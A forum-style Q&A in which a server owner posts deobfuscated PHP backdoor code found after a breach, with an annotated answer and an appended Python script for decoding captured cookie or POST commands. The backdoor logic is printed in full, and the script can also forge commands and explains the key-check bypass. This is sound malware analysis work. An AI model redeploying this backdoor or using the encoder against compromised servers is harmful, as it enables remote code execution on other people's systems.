Trying to understand what this PHP malware does [closed]

4

My server was recently hacked and the attacker uploaded several malicious source files to the web server. I have already deobfuscated the code, but I still don't understand what it does.

It looks like cookie theft targeting visitors, but what does the attacker gain from it?

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);


$approvals = False;

foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;

    $manager_invitation = $cookie_one;
}

function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

function append_strings($append, $string)
{
    return $append ^ $string;
}

if (!$approvals)
{
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        $manager_invitation = $contribute;
    }
}

function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);

            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

$approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    $approvals = Array();
}
else
{
    switch ($approvals['a']){
        case "i":
            $array = Array();
            $array['pv'] = @phpversion();
            $array['sv'] = '1.0-1';
            echo @serialize($array);
            break;
        case "e":
            // eval($approvals['d']);
            // Remove eval and replace with echo due to security concern
            echo ($approvals['d']);
            break;
    }
    exit();

}

function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}



function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));

    return make_submission($sub, $sub_meta);
}

function _base64_decode($input)
{
$buffer = "";
$tbl = Array(
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54,
        55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2,
        3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
        20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30,
        31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
        48, 49, 50, 51, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
        -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1);

    for ($i = 0; $i < strlen($input); ) {
        $b = 0;
        if ($tbl[ord($input[$i])] != -1) {
            $b = ($tbl[ord($input[$i])] & 0xFF) << 18;
        }
        else {
            $i++;
            continue;
        }

        $num = 0;
        if ($i + 1 < strlen($input) && $tbl[ord($input[$i+1])] != -1) {
            $b = $b | (($tbl[ord($input[$i+1])] & 0xFF) << 12);
            $num++;
        }

        if ($i + 2 < strlen($input) && $tbl[ord($input[$i+2])] != -1) {
            $b = $b | (($tbl[ord($input[$i+2])] & 0xFF) << 6);
            $num++;
        }

        if ($i + 3 < strlen($input) && $tbl[ord($input[$i+3])] != -1) {
            $b = $b | ($tbl[ord($input[$i+3])] & 0xFF);
            $num++;
        }

        while ($num > 0) {
            $c = ($b & 0xFF0000) >> 16;
            $buffer .=chr($c);
            $b <<= 8;
            $num--;
        }
        $i += 4;
    }
    return $buffer;

}

asked by cww 20.04.2018 - 12:03

1 answer

2

I personally ran into this code recently. I'll try to write down what I remember and update it as things come back to me. I'll add the code and write the comments as I go.

//Turn off logging so that any errors don't catch people's attention
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);

//Remove the execution time limit (0 means unlimited) so a long-running payload is not killed by PHP
@ini_set('max_execution_time', 0);
@set_time_limit(0);

//Set the key variable of the malware to false to trigger the decryption of the cookie
$approvals = False;

//_COOKIE contains name value pairs, this loops through them. cookie_one gets the name, cookie_two gets the value. So the last entry is going to end up in $approvals and $manager_invitation.
foreach ($_COOKIE as $cookie_one=>$cookie_two)
{
    $approvals = $cookie_two;
    $manager_invitation = $cookie_one;
}

//Obfuscated text basically. Running echo improve_meta(); will return the value of this function. You may find it needs another string added to it and then decoded again to get a meaningful string value. Note "append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')" is typically called with this function. 
function improve_meta()
{
    return _base64_decode("UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH");
}

//This function does not append strings, it XORs them. It's simple to see the output of this function by using echo on the result.
function append_strings($append, $string)
{
    return $append ^ $string;
}

//If approvals is blank, most likely because no cookie was found, loop through the POST parameters.
if (!$approvals)
{
    //The last entry is going to end up in $approvals and $manager_invitation.
    foreach ($_POST as $contribute=>$research)
    {
        $approvals = $research;
        $manager_invitation = $contribute;
    }
}

//Repeating-key XOR: each byte of $people is XORed with the next byte of $collaborate, cycling through $collaborate. The same routine both encrypts and decrypts.
function make_submission($people, $collaborate)
{
    $confirm_invite = "";

    for ($i=0; $i<strlen($people);)
    {
        for ($j=0; $j<strlen($collaborate) && $i<strlen($people); $j++, $i++)
        {
            $extension_param = ord($people[$i]) ^ ord($collaborate[$j]);

            $confirm_invite = $confirm_invite . chr($extension_param);
        }
    }

    return $confirm_invite;
}

$approvals = remove_letter(_base64_decode($approvals), $manager_invitation);

//If approvals.ak has been set with a value, and that value matches the key for this malware. Aren't they nice, making sure only they can access your systems?
if (!isset($approvals['ak']) || !(append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe')) == $approvals['ak'])
{
    $approvals = Array();
}
else
{
    //Approvals.a is the type of action to perform. "i" reports what the system has running on it. 
    //PV is the phpversion of the system, while sv is the malware version. 
    switch ($approvals['a']){
    case "i":
        $array = Array();
        $array['pv'] = @phpversion();
        $array['sv'] = '1.0-1';
        echo @serialize($array);
        break;

    //If "e" is present we end up here. This is where all hell breaks loose. Once all decoding has occurred, what has ended up in approvals.d is simply run.
    //Note that approvals comes from either COOKIE or POST params. So this could be anything. 
    //Think of it as a dynamic backdoor, and all that is present on the affected system is the bootloader. 
    case "e":
        // eval($approvals['d']);
        // Remove eval and replace with echo due to security concern
        echo ($approvals['d']);
        break;
    }
    exit();
}

function remove_letter($data, $key)
{
    return @unserialize(screen_submission($data, $key));
}

function screen_submission($sub_key, $sub_meta)
{
    $sub = make_submission($sub_key, append_strings(improve_meta(), 'dfvaijpefajewpfja9gjdgjoegijdpsodjfe'));
    return make_submission($sub, $sub_meta);
}

//Don't think this is base64 encoding, from memory this was a red herring. It is a decoder though. 
function _base64_decode($input)
{
    // (body omitted in this answer; the full decoder is in the question above)
}

In short, it is not trying to steal cookies; it is going to execute code stored in the cookies. It is a dynamic backdoor as far as I could tell. It is incredibly dangerous to have it available on your website.

answered by Jason 19.09.2018 - 15:58
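Added here as a worked example, not part of either post: a Python re-implementation of the decoding chain the answer walks through, so that a cookie or POST parameter captured from logs can be decoded offline during incident response. The only inputs it needs are the two constants from the sample (the `improve_meta()` blob and the XOR literal); the cookie name `PHPSESSID` and the payload below are constructed for illustration, not captured from a real incident. It also models the `ak` guard as PHP actually parses it: `!` binds tighter than `==`, so `!(append_strings(...)) == $approvals['ak']` compares `false` with `ak`, the real key is never checked, and any truthy value passes.

```python
import base64
import re

# Key material copied verbatim from the sample above.
IMPROVE_META_B64 = "UAMQV1oLEgBLUAsHE11SXwAPSlNVVA5CUwELU11GRlgBWFIH"
XOR_LITERAL = b"dfvaijpefajewpfja9gjdgjoegijdpsodjfe"


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """make_submission(): repeating-key XOR. XOR is its own inverse, so the
    same routine both encrypts and decrypts."""
    if not key:
        return data
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def derive_key() -> bytes:
    """append_strings(improve_meta(), XOR_LITERAL): PHP's string `^`, which
    stops at the shorter operand (both are 36 bytes here)."""
    blob = base64.b64decode(IMPROVE_META_B64)
    return bytes(a ^ b for a, b in zip(blob, XOR_LITERAL))


def decode_request(name: str, value: str) -> bytes:
    """remove_letter(_base64_decode(value), name) without the unserialize():
    base64-decode, XOR with the derived key, then XOR with the parameter name."""
    value = value + "=" * (-len(value) % 4)      # re-pad if a log stripped '='
    raw = base64.b64decode(value)
    return xor_repeat(xor_repeat(raw, derive_key()), name.encode())


def encode_request(name: str, payload: bytes) -> str:
    """Inverse of decode_request(): what the operator's client has to send."""
    masked = xor_repeat(xor_repeat(payload, name.encode()), derive_key())
    return base64.b64encode(masked).decode()


def php_serialize_strings(items: dict) -> bytes:
    """Minimal PHP serialize() for a flat array with string keys and values."""
    out = b"a:%d:{" % len(items)
    for k, v in items.items():
        kb, vb = k.encode(), v.encode()
        out += b's:%d:"%s";s:%d:"%s";' % (len(kb), kb, len(vb), vb)
    return out + b"}"


_STR = re.compile(rb's:(\d+):"')


def php_unserialize_strings(data: bytes) -> dict:
    """Minimal inverse of php_serialize_strings() (string keys/values only)."""
    if not data.startswith(b"a:"):
        raise ValueError("not a serialized PHP array")
    pos = data.index(b"{") + 1
    items = {}

    def read_str(p: int):
        m = _STR.match(data, p)
        if m is None:
            raise ValueError('expected s:N:"..." at offset %d' % p)
        n, start = int(m.group(1)), m.end()
        if data[start + n:start + n + 2] != b'";':
            raise ValueError("length mismatch at offset %d" % start)
        return data[start:start + n].decode(), start + n + 2

    while data[pos:pos + 1] != b"}":
        k, pos = read_str(pos)
        v, pos = read_str(pos)
        items[k] = v
    return items


def ak_check_passes(ak: str) -> bool:
    """The guard `!(append_strings(...)) == $approvals['ak']` is parsed by PHP
    as `(!key) == ak`, i.e. `false == ak`, because `!` binds tighter than `==`.
    The real key is never compared: any PHP-truthy string passes."""
    return ak not in ("", "0")     # PHP casts the string to bool for false == $s


def analyse(name: str, value: str) -> dict:
    """Recover the command fields from a captured cookie/POST name and value."""
    fields = php_unserialize_strings(decode_request(name, value))
    fields["_key_check"] = "passes" if ak_check_passes(fields.get("ak", "")) else "fails"
    return fields


# Constructed sample (not captured from a real incident): the value an operator
# would send, named after a look-alike session cookie, carrying a=e / d=<code>.
SAMPLE_NAME = "PHPSESSID"
SAMPLE_PAYLOAD = {"ak": derive_key().decode(), "a": "e", "d": "phpinfo();"}
SAMPLE_VALUE = encode_request(SAMPLE_NAME, php_serialize_strings(SAMPLE_PAYLOAD))

if __name__ == "__main__":
    print("derived key:", derive_key().decode())
    print("decoded request:", analyse(SAMPLE_NAME, SAMPLE_VALUE))
```

Running it prints the derived key (a UUID-shaped string computed purely from the constants in `improve_meta()` and the XOR literal, so anyone with the source can forge requests) followed by the decoded `ak`, `a` and `d` fields. On the original server `d` went straight to `eval()`; the `echo` substitution in the posted copy removes the execution step but not the decoding, which is why the same decoder is enough to read the operator's traffic out of access logs.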
